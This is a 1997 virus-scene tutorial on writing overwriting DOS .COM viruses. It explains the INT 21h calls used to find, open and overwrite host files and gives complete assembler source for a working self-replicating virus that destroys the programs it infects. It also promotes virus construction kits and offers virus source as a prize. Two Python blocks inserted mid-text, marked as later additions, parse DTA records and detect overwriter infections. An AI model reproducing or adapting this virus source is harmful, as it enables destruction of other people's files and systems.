OVER_TUT.TXT  (VIRDCOLL.ZIP, Collection of Hack-Phreak Scene Programs)  |  Text File  |  1997-07-26
" OverWritting Virii: The perfect choice for beginners "
by Virtual Daemon of SLAM Virus Team
Hi there! The reason I'm writing this little tutorial is that there are
some dumb heads out there who don't know how to use my OVCT...
FUCK YOU LAMERS! I don't know why I'm wasting my time with you...
There are so many guys who don't know what a virus is... God! We must
stop this... We give the public so many goodies (like stealth or
polymorphic virii, or macro virii, etc.), and they don't know how to make
an overwriting virus... That's pathetic! ;-( All they know is that they
must take all the source we give them, modify it and put their stupid
fucking names in our virii! And of course we say that they'll just start
by stealing and learn from it, but not even 2% of them do that. The 98%
are just waiting for us to give them more sources, so they can modify
them some more and spread them around saying that they made that virus...
I'm sick of that! ;-(
I could write a whole book about lamers stealing other people's virii
(mine too), but this was supposed to be an overwriting tutorial, not a... :)
Anyway, now that OVCT has been officially released in SLAM#2, I've got to
do this for those poor guys... maybe this way they'll learn something!
In this phile I'll try to explain the steps in creating an overwriting
virus, and at the end of the file I'll give some source code examples...
Let's begin with the beginning!
Q: What is an overwriting virus?
R: An overwriting virus is a virus that, when reproducing, infects the
victim by overwriting the first part of the program with itself. The rest
of the host stays where it was, so the file keeps its old length, but the
host program is destroyed and will no longer run, which is why overwriting
virii are spotted quickly in practice.
ex. PROGRAM + VIRUS = VIRUSAM
Q: What do I need to make an overwriting virus?
R: In the first place you need a copy of a programming language.
Overwriting virii can be done in many languages such as Pascal, C, Asm,
Basic etc., BUT the best language of all is Assembler. Of course there
are many assemblers out there, but the best of all is Turbo Assembler
from Borland, Inc. So, if you don't have a copy, GET ONE! Hey, when I
said "get one", I meant "buy one", not "STEAL ONE"! ;)
In the 2nd place you need to know how to code in one of the languages
listed above. Since this tutorial requires assembler skills, I suggest
you learn assembler, because this is the best language for creating
virii. If you don't know how to code in assembler I SUGGEST YOU GET
OUT OF HERE AND START LEARNING ASSEMBLER! I'm not gonna teach you how
to code in assembler...
Q: What is the structure of an overwriting virus?
R: Well, it's quite simple... First you need to find a file to infect,
right? Ok. After the file is found you need to open it for reading and
writing. Has the file been opened? Good, now you can do all that stuff
like checking whether it is already infected, or you can simply write your
virus to the file. After the virus is written you need to close the file,
and then return to the operating system (DOS).
Well, that's all! Simple, huh?
Ok. Now let's take it again, this time differently:
1) Find a file to infect
2) Open the file
3) Write your virus to the file
4) Close the file
5) Exit
REMEMBER that this is the simplest structure of an overwriting virus,
so for more stuff check out the sources generated by OVCT!!!
Q: What are the DOS functions I can use in creating an overwriting
virus?
R: Like you've seen before, there are 5 steps in creating a simple
overwriting virus. I'll take the steps again, this time with the related
function...
1) Find a file to infect
- to find a file, you must use the 4Eh function (Find 1st Matching File)
Input:
AH = 4Eh
DS = SEGMENT ADDRESS OF ASCIIZ FILESPEC TO FIND
DX = OFFSET ADDRESS ---------- " " ----------
CX = FILE ATTRIBUTES
Returns:
AX = ERROR CODE IF CF IS SET TO CY
DTA FILLED WITH DATA IF NO ERROR (DTA = Disk Transfer Address)
Simple code:
mov ah,4eh ;find 1st file
mov cx,0 ;cx=0 => normal attributes
mov dx,offset file ;this puts the address of 'file' in DS:DX (DS=CS in a COM)
int 21h
file db '*.com',0 ;this means that it will search for every file
;with the COM extension
Note: if CF comes back set (no file matched, error 12h), the DTA holds
nothing useful. The code in this tutorial doesn't check for that, so it
only behaves when at least one *.com is in the current directory.
Like I said, after this code executes the DTA will be filled with data,
but first let's see the structure of the DTA:
Disk Transfer Address
*------------------*
Offset │ Size │ Contents of DTA
───────────────────────────────
0h │ 21 │ reserved (search state used by 4Fh, Find Next)
15h │ 1 │ file attributes
16h │ 2 │ file time (last write)
18h │ 2 │ file date (last write)
1ah │ 4 │ file size
1eh │ 13 │ 13 byte ASCIIZ of the file name
Note: the size is given in bytes, so in assembler a one-byte value is
declared with 'db', a two-byte value with 'dw', a four-byte value with 'dd'...
ex. file_attributes db ?
file_time dw ?
file_size dd ?
You also must understand that the DTA lies in the PSP (Program Segment
Prefix), the 100h bytes DOS places in front of a COM program's image. Its
default address is offset 80h in the PSP (the same place DOS stores the
command line tail, so the tail is gone after the first find). For complex
virii you must move the DTA to another location (function 1Ah, Set DTA)
so you won't trash the PSP. Anyway, since we're talking about overwriting
virii, that's not important.
All we have to do after we find a file is to take its name from the DTA,
because the following function (open) needs the file name. Like I said,
the DTA is at 80h. The file name is at 1eh in the DTA, so all you have to
do is add 1eh to 80h, and 'voilà!'
ex. file_name=80h+1eh=9eh
Note that the name in the DTA is the bare 8.3 name with no path, so the
open below only works because the file sits in the current directory.
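The DTA layout above, decoded in code. This is an added example written for this page, not code from the tutorial or from OVCT: a small Python parser for the 43-byte find-first record, with the packed DOS date and time fields unpacked. The sample record is constructed by hand to look like what DOS would leave at PSP:80h after '*.com' matched a file; it is not a captured DTA, and the file name, size and timestamp in it are made up.

```python
"""Decode the Disk Transfer Area that INT 21h/4Eh (Find First) fills in.

Added example, not part of the original tutorial. Offsets follow the table
above (15h attributes, 16h time, 18h date, 1Ah size, 1Eh ASCIIZ name).
"""
import struct

PSP_DTA = 0x80          # default DTA lives at offset 80h of the PSP
DTA_SIZE = 0x2B         # 21 reserved + 1 + 2 + 2 + 4 + 13 = 43 bytes
DTA_NAME_OFF = 0x1E
ATTR_BITS = {0x01: "RO", 0x02: "HIDDEN", 0x04: "SYSTEM",
             0x08: "VOLUME", 0x10: "DIR", 0x20: "ARCHIVE"}


def decode_dos_time(t):
    """Packed DOS time: bits 15-11 hour, 10-5 minute, 4-0 seconds/2."""
    return (t >> 11) & 0x1F, (t >> 5) & 0x3F, (t & 0x1F) * 2


def decode_dos_date(d):
    """Packed DOS date: bits 15-9 year-1980, 8-5 month, 4-0 day."""
    return 1980 + ((d >> 9) & 0x7F), (d >> 5) & 0x0F, d & 0x1F


def parse_dta(dta):
    """Return the fields of one find-first record as a dict."""
    if len(dta) < DTA_SIZE:
        raise ValueError("DTA record needs %d bytes, got %d" % (DTA_SIZE, len(dta)))
    # '<' = little-endian, no padding: B at 15h, H at 16h, H at 18h, I at 1Ah
    attr, ftime, fdate, size = struct.unpack_from("<BHHI", dta, 0x15)
    raw = dta[DTA_NAME_OFF:DTA_NAME_OFF + 13]
    name = raw.split(b"\x00", 1)[0].decode("ascii")   # bare 8.3 name, no path
    y, mo, d = decode_dos_date(fdate)
    h, mi, s = decode_dos_time(ftime)
    return {
        "name": name,
        "attributes": [label for bit, label in ATTR_BITS.items() if attr & bit],
        "size": size,
        "mtime": "%04d-%02d-%02d %02d:%02d:%02d" % (y, mo, d, h, mi, s),
    }


def build_dta(name, attr, size, ymd, hms):
    """Inverse of parse_dta; used only to construct the sample record below."""
    y, mo, d = ymd
    h, mi, s = hms
    ftime = (h << 11) | (mi << 5) | (s // 2)
    fdate = ((y - 1980) << 9) | (mo << 5) | d
    body = struct.pack("<BHHI", attr, ftime, fdate, size)
    return b"\x00" * 0x15 + body + name.encode("ascii").ljust(13, b"\x00")


# Constructed sample: a plausible record for COMMAND.COM (not captured from DOS).
SAMPLE_DTA = build_dta("COMMAND.COM", 0x20, 54645, (1994, 5, 31), (6, 22, 0))

# Where the virus reads the name from: PSP offset of the DTA plus the name offset.
NAME_ADDR = PSP_DTA + DTA_NAME_OFF   # 9Eh, the 'mov dx,9eh' in the tutorial

if __name__ == "__main__":
    print(hex(NAME_ADDR), parse_dta(SAMPLE_DTA))
```

The 21 reserved bytes are not padding: they hold the search state that function 4Fh (Find Next) continues from, so anything that wants a second match must leave them alone between the two calls.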
2) OPEN THE FILE
- to open a file, you can use the 3Dh function (Open a File Handle)
Input:
AH = 3Dh
DS = SEGMENT ADDRESS OF ASCIIZ FILENAME (our file name)
DX = OFFSET ADDRESS ------------ " " ----------------
AL = OPEN MODE (low 3 bits = access mode)
-> 00h FOR READING ONLY
-> 01h FOR WRITING ONLY
-> 02h FOR READING & WRITING
Returns:
AX = ERROR CODE IF CF IS SET TO CY
ELSE FILE HANDLE
Simple code:
;- the following 2 instructions can be replaced with "mov ax,3d02h"
mov ah,3dh ;open the file
mov al,02h ;for reading & writing
mov dx,9eh ;get file name from DTA
int 21h
Note: the file handle is now in AX, but if we have a look below at the
other functions, we see that all of them need the file handle in BX, so
we have to move it from AX to BX.
ex: xchg bx,ax ;this can be done also with "mov bx,ax" (xchg is 1 byte shorter)
Note: the open fails (CF set, error 05h) on a file with the read-only
attribute, and then AX holds an error code, not a handle; the code here
doesn't check for that either.
3) WRITE THE VIRUS TO FILE
- in order to write something to a file, you must use the 40h function
(Write to File via Handle)
Input:
AH = 40h
BX = FILE HANDLE (this is why we moved AX into BX)
DX = OFFSET ADDRESS OF THE BEGINNING OF THE VIRUS
CX = NUMBER OF BYTES TO WRITE
Returns:
AX = ERROR CODE IF CF IS SET TO CY
ELSE NUMBER OF BYTES ACTUALLY WRITTEN <- USE FOR ERROR TESTS
Simple code:
mov ah,40h ;write the virus
mov dx,offset virus_start ;buffer to write
mov cx,offset virus_end - offset virus_start ;size of virus
int 21h
The write starts at the file pointer, which is 0 right after the open, so
the virus lands over the first bytes of the host. Nothing is truncated, so
the host keeps its length unless it was shorter than the virus, in which
case DOS extends it.
4) CLOSE THE FILE
- for closing the file, you must use the 3eh function (Close a File via
Handle)
Input:
AH = 3Eh
BX = FILE HANDLE
Returns:
AX = ERROR CODE IF CF IS SET TO CY
Simple code:
mov ah,3eh ;close the file
int 21h
5) Exit
- the simplest part
Here you can use 2 methods:
a) int 20h
b) mov ah,4ch
int 21h
Both methods do the same thing: they terminate the program and return to
the operating system. Since the first one is smaller (2 bytes instead of
4), I suggest using that one. Note that int 20h expects CS to point at the
PSP, which is always true in a COM program but not in an EXE.
Q: Now that I have all the information, how do I put it all together?
R: GOD! If you're still asking me this after everything I showed you then
you really suck! You're the biggest lamer! But... since I'm a good person
I'll show you this too... ;-)
────────────────────────────────────────────» cut here
; Virus Name: Lamer
; Virus Author: You
; To assemble use: tasm lamer.asm
; tlink /t lamer.obj
; (of course this expects that you'll cut & paste this code into a file
; called lamer.asm ;-)
code segment
assume cs:code,ds:code
org 100h ;for COM files
virus_start:
mov ah,4eh ;find first file
xor cx,cx ;cx=0 => normal files
mov dx,offset filespec ;ASCIIZ adress of what to search for
int 21h
mov ax,3d02h ;I explained this to ya earlier ;)
mov dx,9eh ;get file name from DTA
int 21h
xchg bx,ax ;put file handle in bx
mov ah,40h ;write the virus to file
mov dx,offset virus_start ;buffer containing data to write
mov cx,offset virus_end - offset virus_start ;size of virus
int 21h
mov ah,3eh ;close the file
int 21h
int 20h ;return to DOS
filespec db '*.com',0
virus_end:
code ends
end virus_start
────────────────────────────────────────────» cut here
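What the source above leaves behind, seen from the defender's side. The following Python is an added example written for this page; it is not the tutorial's code and not part of OVCT. It models the effect of the INT 21h/40h write (the virus body lands over the first bytes of the host, the rest of the file stays, so the length is unchanged) and shows the two checks a practitioner uses to spot it: comparing against an integrity baseline when one exists, and, without a baseline, looking for .COM files that share a long identical head but are not byte-for-byte copies. File names, file contents and the "virus head" are all constructed filler; no real program or virus code is embedded.

```python
"""Tell overwriter infections apart from other file changes on a set of .COM files.

Added example, not from the tutorial or OVCT. An overwriter replaces the first N
bytes of every host with the same N bytes and leaves the rest untouched, so its
victims share an identical head while their lengths and tails still differ.
"""
import hashlib
from collections import defaultdict

HEAD_LEN = 32  # leading bytes compared; unrelated programs essentially never share this many


def _filler(seed, size):
    """Constructed stand-in for a program image (deterministic LCG bytes)."""
    out, x = bytearray(), seed
    while len(out) < size:
        x = (x * 1103515245 + 12345) & 0xFFFFFFFF
        out.append((x >> 16) & 0xFF)
    return bytes(out)


def overwrite(host, head):
    """What the tutorial's write does: replace the head in place. The length only
    changes if the host was shorter than the virus (DOS extends on a write past EOF)."""
    return head + host[len(head):]


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def take_baseline(files):
    """Per file: (length, hash of head, hash of whole file), as an integrity
    checker would store them before any infection."""
    return {n: (len(d), sha256(d[:HEAD_LEN]), sha256(d)) for n, d in files.items()}


def classify_changes(files, baseline):
    """Overwriter signature: head changed, length unchanged. Appenders and
    prependers also change the head (patched entry) but grow the file."""
    verdicts = {}
    for name, data in files.items():
        if name not in baseline:
            verdicts[name] = "new"
            continue
        size0, head0, full0 = baseline[name]
        head_changed = sha256(data[:HEAD_LEN]) != head0
        if sha256(data) == full0:
            verdicts[name] = "unchanged"
        elif head_changed and len(data) == size0:
            verdicts[name] = "overwriter"
        elif head_changed and len(data) > size0:
            verdicts[name] = "appender-or-prepender"
        else:
            verdicts[name] = "modified"
    return verdicts


def _common_prefix(a, b):
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def cluster_by_head(files, head_len=HEAD_LEN):
    """No baseline: files sharing an identical head that are not byte-identical
    copies are the classic trace of an overwriter that hit several hosts."""
    by_head = defaultdict(list)
    for name, data in files.items():
        if len(data) >= head_len:
            by_head[data[:head_len]].append(name)
    hits = {}
    for head, names in by_head.items():
        if len(names) < 2 or len({files[n] for n in names}) < 2:
            continue  # a single file, or legitimate duplicate copies of one program
        first = files[names[0]]
        common = min(_common_prefix(first, files[n]) for n in names[1:])
        hits[head.hex()] = {"files": sorted(names), "shared_head": common}
    return hits


# Constructed sample directory: before, and after the virus ran on two hosts.
FAKE_VIRUS_HEAD = _filler(0xBEEF, 60)          # stands in for the virus body; not real code
CLEAN = {
    "EDIT.COM": _filler(1, 4000),
    "MORE.COM": _filler(2, 900),
    "TREE.COM": _filler(3, 2500),
    "COPY1.COM": _filler(4, 1200),
    "COPY2.COM": _filler(4, 1200),              # an ordinary duplicate, must not be flagged
}
INFECTED = dict(CLEAN)
INFECTED["EDIT.COM"] = overwrite(CLEAN["EDIT.COM"], FAKE_VIRUS_HEAD)
INFECTED["TREE.COM"] = overwrite(CLEAN["TREE.COM"], FAKE_VIRUS_HEAD)
# For contrast, MORE.COM gets an appender-style change: entry patched, body grown.
INFECTED["MORE.COM"] = b"\xE9\x00\x00" + CLEAN["MORE.COM"][3:] + _filler(5, 40)

if __name__ == "__main__":
    print(classify_changes(INFECTED, take_baseline(CLEAN)))
    print(cluster_by_head(INFECTED))
```

The baseline check is the strong one: "head changed, length unchanged" separates an overwriter from the appending and prepending virii the author mentions later, which have to grow the file. The clustering check is what you fall back on when no baseline was ever taken, and the duplicate-copy exclusion matters, since a directory with two copies of the same utility would otherwise look like two victims.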
Well, that's it! You've just learned how to create your first virus (I
hope! ;-) If you don't understand this then GET LOST! There's no place
for you in this life...:)
About OVCT (Overwriting Virus Construction Toolkit):
I made that shit not because I don't know how to do anything else... I made
it for you! Yes, for you, "dear friend", so you can learn how to create
some virii. When you think you're smart enough to create & understand
non-overwriting virii or TSR virii, then you can use my VCT (Virus
Construction Toolkit) which will generate non-overwriting runtime
or TSR virii. Of course the generated virii will be stealth, encrypted,
anti-debugger, polymorphic, etc. I think that the 1st version of VCT
will be released during this summer (the summer of 1997). For more info
about all this check OVCT.DOC from the OVCT distribution kit, or read the
SLAM Magazine...
Did you get all that? Anyway, I don't wanna see lamers "playing" with
my kit and releasing virii or spreading them to other people's computers!!!
(I think this is one of the many reasons why I didn't include bombs in
OVCT :). If I see a virus created with OVCT in the field, and if I hear
reports from people who got their computers infected with virii created
with OVCT, YOU CAN SAY GOODBYE TO YOUR LIFE, LAMER, BECAUSE I'M COMING TO
GET YA'!!! Btw: I'm not only a virus writer, I'm a GOD DAMN GOOD HACKER
TOO!!! So, you'll hear from me... ;-)
Game over... Uh, uh... I mean, I think this is the end of this shit...
P.S. If any of this information helped anyone in any way (not negative)
in creating a virus, please let me know by sending me an e-mail. And, if
you're really honest with me, you'll get a special prize like the source
to my latest virus :) :) :)! And believe me, you'll want it!
Greetz:
──────
- to all the SLAM members
- Dark Angel: you were the best!
- Cicatrix: I love your VDAT!!! :)
- and to everybody else who is related to virus scene